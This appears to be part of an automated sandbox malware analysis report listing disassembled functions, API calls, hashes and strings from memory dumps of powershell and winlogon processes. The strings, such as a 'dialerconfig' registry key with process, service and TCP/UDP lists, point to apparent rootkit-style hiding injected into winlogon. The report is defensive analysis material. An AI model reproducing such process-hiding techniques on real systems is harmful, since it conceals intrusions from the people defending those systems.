Source File: 00000018.00000002.1777559408.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff7c0dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 798543a4a1e885f82ec02696ce45c48c30466f470d9d0f3a12fad74fd50d0aa5
Instruction ID: e0e3274f9a2fadec97f68d18de4e95ceceedc44ed7ab5271b53e2483ccca48bc
Opcode Fuzzy Hash: 798543a4a1e885f82ec02696ce45c48c30466f470d9d0f3a12fad74fd50d0aa5
Instruction Fuzzy Hash: C9E1A270A0CA4E8FDB99EF58C445AA9BBE1FF58350F5442B9D009D7286DB24F845CBD0

Function 00007FF7C0E9525E Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1778221414.00007FF7C0E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff7c0e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 673d67694bb15efccfa7dba7d0757167e22a2ac28a72a9ab3cdf939df6b47ed7
Instruction ID: ba96f2be1f81eb1ea5d3a402a74325532502ecb132c6b96db86020d84fd49751
Opcode Fuzzy Hash: 673d67694bb15efccfa7dba7d0757167e22a2ac28a72a9ab3cdf939df6b47ed7
Instruction Fuzzy Hash: CF81252154E7C64FD793AB7848255A17FE1EF57220B0941FFC089CB1E3DA5DA84AC3A2

Function 00007FF7C0E94C1F Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1778221414.00007FF7C0E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff7c0e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f31bf2690c889f6e8bb20cb6ef39b9082cbd876b4f01aaa332248c12c1a057b
Instruction ID: 6d3c093c2952ebae5ec2a6f9c065986064ea5bb0188d6b160bb6f1a2d52c37c7
Opcode Fuzzy Hash: 9f31bf2690c889f6e8bb20cb6ef39b9082cbd876b4f01aaa332248c12c1a057b
Instruction Fuzzy Hash: 73510372E4DA495FE7A9FA18A845AF5B7E1EF85330B5801BAD40DC3282DB25BC158390

Function 00007FF7C0E94943 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1778221414.00007FF7C0E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff7c0e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a5c0e8b9b29ca9e328f2c26647fcb19a83c43af940e4cf1217baf832e4901ef
Instruction ID: b96f0bc11777e4e613baa8467ac7273c5c5ab7cd1759e24e02ffe2323f4bdd09
Opcode Fuzzy Hash: 2a5c0e8b9b29ca9e328f2c26647fcb19a83c43af940e4cf1217baf832e4901ef
Instruction Fuzzy Hash: D851E572A4CA464FE799BA2C5451AF9B7D2EF85330B9801BAC04EC7293EF15F8058395

Function 00007FF7C0E95318 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1778221414.00007FF7C0E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff7c0e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d96805209cf406aac26252bf1e04c53746f130a15b4e129aa7dddbc418dee9d
Instruction ID: 319702f39460275e2727ab63b2a9a6964530dc08c7c520ef9e1a46daacfb5ddf
Opcode Fuzzy Hash: 9d96805209cf406aac26252bf1e04c53746f130a15b4e129aa7dddbc418dee9d
Instruction Fuzzy Hash: C9417822A0CB894FE395FA2858155B5BBE0FF56260F4801BFD449C7293DA59FC84C3E2

Function 00007FF7C0CAF363 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1776789277.00007FF7C0CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CAD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff7c0cad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f778b0aa155687a2c62f63e9ecd3ec4a6447f4489bc6349e8392ac6b6f2fb56c
Instruction ID: 1d6b470dad7108163f940b3d9e0930bf204fb51ebb1e87568fae9bf965b9d09e
Opcode Fuzzy Hash: f778b0aa155687a2c62f63e9ecd3ec4a6447f4489bc6349e8392ac6b6f2fb56c
Instruction Fuzzy Hash: 8041F77140EBC44FE7569B299855A927FB0EF57220B0905DFD088CB1A3D629A846C7A2

Function 00007FF7C0DCA0E5 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1777559408.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff7c0dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92b8b1b7309234452c3addfde92c643c38348fd267e11151d725a8d6e58c2008
Instruction ID: 1bf38747bc11719757ed5ab8be3550eb1a9cb98db1a1fa713d404b11ec80813b
Opcode Fuzzy Hash: 92b8b1b7309234452c3addfde92c643c38348fd267e11151d725a8d6e58c2008
Instruction Fuzzy Hash: 7B31E53191CB484FDB58DB5C984A6A97BE0FB99320F00426FE449C3292DB74A855CBD2

Function 00007FF7C0DCB028 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1777559408.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff7c0dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e1f3ca01b7cfc9a62985cb5d4fddd3ff3ac8818b0efdc8972c5a4237d1f0ab4
Instruction ID: a81551654834510441d41875007c82d7c9ce6fac4a1d48fee82e0f0e36b8db28
Opcode Fuzzy Hash: 5e1f3ca01b7cfc9a62985cb5d4fddd3ff3ac8818b0efdc8972c5a4237d1f0ab4
Instruction Fuzzy Hash: CF21F63190CB4C4FDB59DFAC984A7E9BBE0EB96331F04426BD449C3152D670A41ACB91

Function 00007FF7C0E9498F Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1778221414.00007FF7C0E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff7c0e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23efca51fc89106052fd6649447b7500aa028e4095a921b7948887ece65b0cf6
Instruction ID: 8a3f546ff60d88c74e713c8ac940faad58069bdefe24fdc02252aad381d314be
Opcode Fuzzy Hash: 23efca51fc89106052fd6649447b7500aa028e4095a921b7948887ece65b0cf6
Instruction Fuzzy Hash: BC21F572D8DA874FE7A9FF1854559B9A6D2EF85330B8801BAC00DC7692DF18FC048395

Function 00007FF7C0E95311 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1778221414.00007FF7C0E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff7c0e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03a4dff4550e2162e1a93f96614fccb49aaf489ec71af862ce7250c5c033778a
Instruction ID: 5adf6523fc23f4e7719ccac3c47af8408660e692fda545ce764ad24a78a59dd6
Opcode Fuzzy Hash: 03a4dff4550e2162e1a93f96614fccb49aaf489ec71af862ce7250c5c033778a
Instruction Fuzzy Hash: CB210122A0CB498FE794FE2C88156B4B7D1FF99360F5841BEC04DC7286DA69B885C7D1

Function 00007FF7C0E94C8C Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1778221414.00007FF7C0E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff7c0e90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c42cbe0fa77dc26117e35317575f738bcffd53284e950ef858814e3b0d0f4b1
Instruction ID: 708b7601ba38c3f9fe4e5b268d9b83ac00a6e1763364022bd32e4c4d811fc3e7
Opcode Fuzzy Hash: 7c42cbe0fa77dc26117e35317575f738bcffd53284e950ef858814e3b0d0f4b1
Instruction Fuzzy Hash: C211E0B294E9854FE6A9FB2894549B8BBD0EF4533079900FAD00DCB692CB19BC048390

Function 00007FF7C0DC4675 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1777559408.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff7c0dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9917f3665b61f1b4cf24688b0974a73972e94ae79d024ecab79b6f9db2d56c36
Instruction ID: c1e02972284ac0ca24265e7134863c839b347ffb462bcc828154df31c1af7abd
Opcode Fuzzy Hash: 9917f3665b61f1b4cf24688b0974a73972e94ae79d024ecab79b6f9db2d56c36
Instruction Fuzzy Hash: CA01A77010CB0C4FD744EF0CE451AA5B7E0FB85364F10056EE58AC3651D732E881CB45

Function 00007FF7C0DCAE68 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1777559408.00007FF7C0DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff7c0dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec9a1456c71394a908c6e8ea4937f7940f11a7545c6f2a02128bfa457b6bbf18
Instruction ID: 45f1b1be0e6adfef60dbddd2216be2f84c192d7096670de834e8306516c85606
Opcode Fuzzy Hash: ec9a1456c71394a908c6e8ea4937f7940f11a7545c6f2a02128bfa457b6bbf18
Instruction Fuzzy Hash: 94F0B43480868D8FDB0AEF3888555D5BFA0EF26250B0502DBE459C71B2DB64A458CBD2

Analysis Process: winlogon.exePID: 552, Parent PID: 2788COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	94.1%
Signature Coverage:	0%
Total number of Nodes:	102
Total number of Limit Nodes:	16

Executed Functions

Function 000001FC60381650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001FC6038165B
HeapAlloc.KERNEL32 ref: 000001FC6038166A

Part of subcall function 000001FC60381274: GetProcessHeap.KERNEL32 ref: 000001FC6038127A
Part of subcall function 000001FC60381274: HeapAlloc.KERNEL32 ref: 000001FC60381289
Part of subcall function 000001FC60381274: GetProcessHeap.KERNEL32 ref: 000001FC603812A3
Part of subcall function 000001FC60381274: HeapAlloc.KERNEL32 ref: 000001FC603812B4

RegOpenKeyExW.ADVAPI32 ref: 000001FC603816DA
RegOpenKeyExW.ADVAPI32 ref: 000001FC60381707
RegCloseKey.ADVAPI32 ref: 000001FC60381721
RegOpenKeyExW.ADVAPI32 ref: 000001FC60381741
RegCloseKey.ADVAPI32 ref: 000001FC6038175C
RegOpenKeyExW.ADVAPI32 ref: 000001FC6038177C
RegCloseKey.ADVAPI32 ref: 000001FC60381797
RegOpenKeyExW.ADVAPI32 ref: 000001FC603817B7
RegCloseKey.ADVAPI32 ref: 000001FC603817D2
RegOpenKeyExW.ADVAPI32 ref: 000001FC603817F2
RegCloseKey.ADVAPI32 ref: 000001FC6038180D
RegOpenKeyExW.ADVAPI32 ref: 000001FC6038182D
RegCloseKey.ADVAPI32 ref: 000001FC60381848
RegOpenKeyExW.ADVAPI32 ref: 000001FC60381868
RegCloseKey.ADVAPI32 ref: 000001FC60381883
RegOpenKeyExW.ADVAPI32 ref: 000001FC603818A3
RegCloseKey.ADVAPI32 ref: 000001FC603818BE
RegCloseKey.ADVAPI32 ref: 000001FC603818C8

Part of subcall function 000001FC603812C8: RegQueryInfoKeyW.ADVAPI32 ref: 000001FC60381326
Part of subcall function 000001FC603812C8: GetProcessHeap.KERNEL32 ref: 000001FC60381334
Part of subcall function 000001FC603812C8: HeapAlloc.KERNEL32 ref: 000001FC60381345
Part of subcall function 000001FC603812C8: RegEnumValueW.ADVAPI32 ref: 000001FC603813A1
Part of subcall function 000001FC603812C8: GetProcessHeap.KERNEL32 ref: 000001FC603813E9
Part of subcall function 000001FC603812C8: HeapAlloc.KERNEL32 ref: 000001FC603813F7
Part of subcall function 000001FC603812C8: GetProcessHeap.KERNEL32 ref: 000001FC6038141B
Part of subcall function 000001FC603812C8: HeapFree.KERNEL32 ref: 000001FC60381429
Part of subcall function 000001FC603812C8: lstrlenW.KERNEL32 ref: 000001FC60381432
Part of subcall function 000001FC603812C8: GetProcessHeap.KERNEL32 ref: 000001FC60381440
Part of subcall function 000001FC603812C8: HeapAlloc.KERNEL32 ref: 000001FC6038144E

Strings

startup, xrefs: 000001FC603816FD
udp, xrefs: 000001FC6038189C
SOFTWARE\dialerconfig, xrefs: 000001FC603816BA
paths, xrefs: 000001FC603817B0
process_names, xrefs: 000001FC60381775
tcp_local, xrefs: 000001FC60381826
pid, xrefs: 000001FC6038173A
tcp_remote, xrefs: 000001FC60381861
service_names, xrefs: 000001FC603817EB

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: fa4ec25ea257bf5a4a23c3e5860bcb8198656e1836d139df6f6cf70dd4e3e0b3
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 85712D76754E5A85EB109F65E9406ED27B8F7C4BAAF001131DE4EA7B28EF38C445E380

Function 000001FC60385C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001FC60385C4B
GetThreadContext.KERNEL32 ref: 000001FC60385DB5

Part of subcall function 000001FC60385A40: GetCurrentThreadId.KERNEL32 ref: 000001FC60385A44

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction ID: c7988245ba4ad4ff1b66b08afb2fbf512223838491f5514b01a6aa9bb1dfc528
Opcode Fuzzy Hash: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction Fuzzy Hash: D2D1DB3624CB8982DA709B1AE5943AA77B0F3C8B95F100172EACD97BA5DF3CC551DB40

Function 000001FC603851B0 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 000001FC60385236

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction ID: f7ede83f57386263edf5ed3ff2a078ca52541d318d77ad383a7b8e0f148c742d
Opcode Fuzzy Hash: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction Fuzzy Hash: 9F02F83625DB8586EB60CB55E5803AAB7B0F3C57A1F100035EA8E97BA8DF7CC484DB40

Function 000001FC60383878 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 000001FC60383886
GetCurrentProcess.KERNEL32 ref: 000001FC603838B4
VirtualProtectEx.KERNEL32 ref: 000001FC603838D6
GetCurrentProcess.KERNEL32 ref: 000001FC603838F4
VirtualProtectEx.KERNEL32 ref: 000001FC60383915

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 5df52e58bac3762cb90efa087e852b5e6655a28a13e00211ef51369d9c46b2b3
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 72115E3A748B4682FB549B21F5043B966B0FB88BA5F040079DE9D977A4EF3DC508D740

Function 000001FC60383AC0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 000001FC60383B46
VirtualAlloc.KERNEL32 ref: 000001FC60383B80

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction ID: b55822d6e0ed61c1cd75b894da625db63daf6f32bdb340b27bb2b326a9aa8025
Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction Fuzzy Hash: E331507225EA8981EB31DB15E1443BEA2B0F3C87A5F100575F5CD96BA8DF7CC5409B80

Function 000001FC60383458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000001FC6038347A
PathFindFileNameW.SHLWAPI ref: 000001FC60383489

Part of subcall function 000001FC60383930: StrCmpNIW.SHLWAPI ref: 000001FC60383948

Part of subcall function 000001FC60383878: GetModuleHandleW.KERNEL32 ref: 000001FC60383886
Part of subcall function 000001FC60383878: GetCurrentProcess.KERNEL32 ref: 000001FC603838B4
Part of subcall function 000001FC60383878: VirtualProtectEx.KERNEL32 ref: 000001FC603838D6
Part of subcall function 000001FC60383878: GetCurrentProcess.KERNEL32 ref: 000001FC603838F4
Part of subcall function 000001FC60383878: VirtualProtectEx.KERNEL32 ref: 000001FC60383915

CreateThread.KERNEL32 ref: 000001FC603834D7

Part of subcall function 000001FC60381EB4: GetCurrentThread.KERNEL32 ref: 000001FC60381EBF

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: c83453063aff92f5c858f85296b5434323b9113bcffa946010c3fcc88095162d
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: FA113C7169DA0B92FB219722EB067F522B4B7D4337F440075995EE6394FF39C448A6C0

Function 000001FC60384ED0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000001FC60384ED4
VirtualProtect.KERNEL32 ref: 000001FC60384F17
FlushInstructionCache.KERNEL32 ref: 000001FC60384F2C

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction ID: c6159baff293344a8c7c7719743aa4522e1a460afa7fc0f07a1a5f9051549037
Opcode Fuzzy Hash: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction Fuzzy Hash: 96F0173625CB4981D630DB05E5413AAA7B4F3C87E5F140176BA8E97BA9DE38C2809B40

Function 000001FC5FF92908 Relevance: 3.2, APIs: 2, Instructions: 186
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000001FC5FF929AA
LoadLibraryA.KERNELBASE ref: 000001FC5FF92A31

Memory Dump Source

Source File: 0000001B.00000002.2665367132.000001FC5FF90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC5FF90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc5ff90000_winlogon.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 5b960491ad0aa9f390f7106203935d26d4b069af87d81515c1953460d8fbcbdd
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: CB61EC3270125B87EB6CCF2696507BCB3D1FB44BA4F1482219A2907BA5DA38E853D740

Function 000001FC60381C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000001FC60381650: GetProcessHeap.KERNEL32 ref: 000001FC6038165B
Part of subcall function 000001FC60381650: HeapAlloc.KERNEL32 ref: 000001FC6038166A
Part of subcall function 000001FC60381650: RegOpenKeyExW.ADVAPI32 ref: 000001FC603816DA
Part of subcall function 000001FC60381650: RegOpenKeyExW.ADVAPI32 ref: 000001FC60381707
Part of subcall function 000001FC60381650: RegCloseKey.ADVAPI32 ref: 000001FC60381721
Part of subcall function 000001FC60381650: RegOpenKeyExW.ADVAPI32 ref: 000001FC60381741
Part of subcall function 000001FC60381650: RegCloseKey.ADVAPI32 ref: 000001FC6038175C
Part of subcall function 000001FC60381650: RegOpenKeyExW.ADVAPI32 ref: 000001FC6038177C
Part of subcall function 000001FC60381650: RegCloseKey.ADVAPI32 ref: 000001FC60381797
Part of subcall function 000001FC60381650: RegOpenKeyExW.ADVAPI32 ref: 000001FC603817B7
Part of subcall function 000001FC60381650: RegCloseKey.ADVAPI32 ref: 000001FC603817D2
Part of subcall function 000001FC60381650: RegOpenKeyExW.ADVAPI32 ref: 000001FC603817F2

Sleep.KERNEL32 ref: 000001FC60381C43
SleepEx.KERNELBASE ref: 000001FC60381C49

Part of subcall function 000001FC60381650: RegCloseKey.ADVAPI32 ref: 000001FC6038180D
Part of subcall function 000001FC60381650: RegOpenKeyExW.ADVAPI32 ref: 000001FC6038182D
Part of subcall function 000001FC60381650: RegCloseKey.ADVAPI32 ref: 000001FC60381848
Part of subcall function 000001FC60381650: RegOpenKeyExW.ADVAPI32 ref: 000001FC60381868
Part of subcall function 000001FC60381650: RegCloseKey.ADVAPI32 ref: 000001FC60381883
Part of subcall function 000001FC60381650: RegOpenKeyExW.ADVAPI32 ref: 000001FC603818A3
Part of subcall function 000001FC60381650: RegCloseKey.ADVAPI32 ref: 000001FC603818BE
Part of subcall function 000001FC60381650: RegCloseKey.ADVAPI32 ref: 000001FC603818C8

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 7a0bf509805bea29151f194b131c6df09668b9c29c16b10dbc5c96b7ffd279ca
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: FB31C075288A0B91FA509F36DB413FA52B8BBC4BE2F0450B1DE2DE7795EE14C854A2D0

Function 000001FC603B2908 Relevance: 1.4, APIs: 1, Instructions: 186
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000001FC603B29AA

Memory Dump Source

Source File: 0000001B.00000002.2669173215.000001FC603B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001FC603B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc603b0000_winlogon.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 00737a10683721a8e03d4d7f52efa22dad71314721843b21113caceac9bf89e3
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 1E61203274525A83EA68CF25D7407BCB3A1FBA4BA9F048235DA1D97784DF38E852D740

Non-executed Functions

Function 000001FC60382CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000001FC60382D80
lstrlenW.KERNEL32 ref: 000001FC60382FBA

Part of subcall function 000001FC60381A14: OpenProcess.KERNEL32 ref: 000001FC60381A3A
Part of subcall function 000001FC60381A14: K32GetModuleFileNameExW.KERNEL32 ref: 000001FC60381A58
Part of subcall function 000001FC60381A14: PathFindFileNameW.SHLWAPI ref: 000001FC60381A67
Part of subcall function 000001FC60381A14: lstrlenW.KERNEL32 ref: 000001FC60381A73
Part of subcall function 000001FC60381A14: StrCpyW.SHLWAPI ref: 000001FC60381A86
Part of subcall function 000001FC60381A14: CloseHandle.KERNEL32 ref: 000001FC60381A94

GetProcAddress.KERNEL32 ref: 000001FC60382D95

Part of subcall function 000001FC60381554: StrCmpIW.SHLWAPI ref: 000001FC60381585

Part of subcall function 000001FC60383930: StrCmpNIW.SHLWAPI ref: 000001FC60383948

StrCmpNIW.SHLWAPI ref: 000001FC60382DD8
lstrlenW.KERNEL32 ref: 000001FC60382F00

Strings

ntdll.dll, xrefs: 000001FC60382D79
NtQueryObject, xrefs: 000001FC60382D8B
\Device\Nsi, xrefs: 000001FC60382DCB

Memory Dump Source

Source File: 0000001B.00000002.2667042133.000001FC60380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FC60380000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1fc60380000_winlogon.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 3a1ecd4d40360f242c04eb120c8e4b4277da95b108af6828916387a0e1affdc6
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 3BB19D72258A5A82EB648F25C7407F963B4F7C4BA6F145076EE4EA3794EB35CD40E380

Function 000001FC60387E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000001FC60387E8C
RtlCaptureContext.NTDLL ref: 000001FC60387EB9
RtlLookupFunctionEntry.NTDLL ref: 000001FC60387ED3
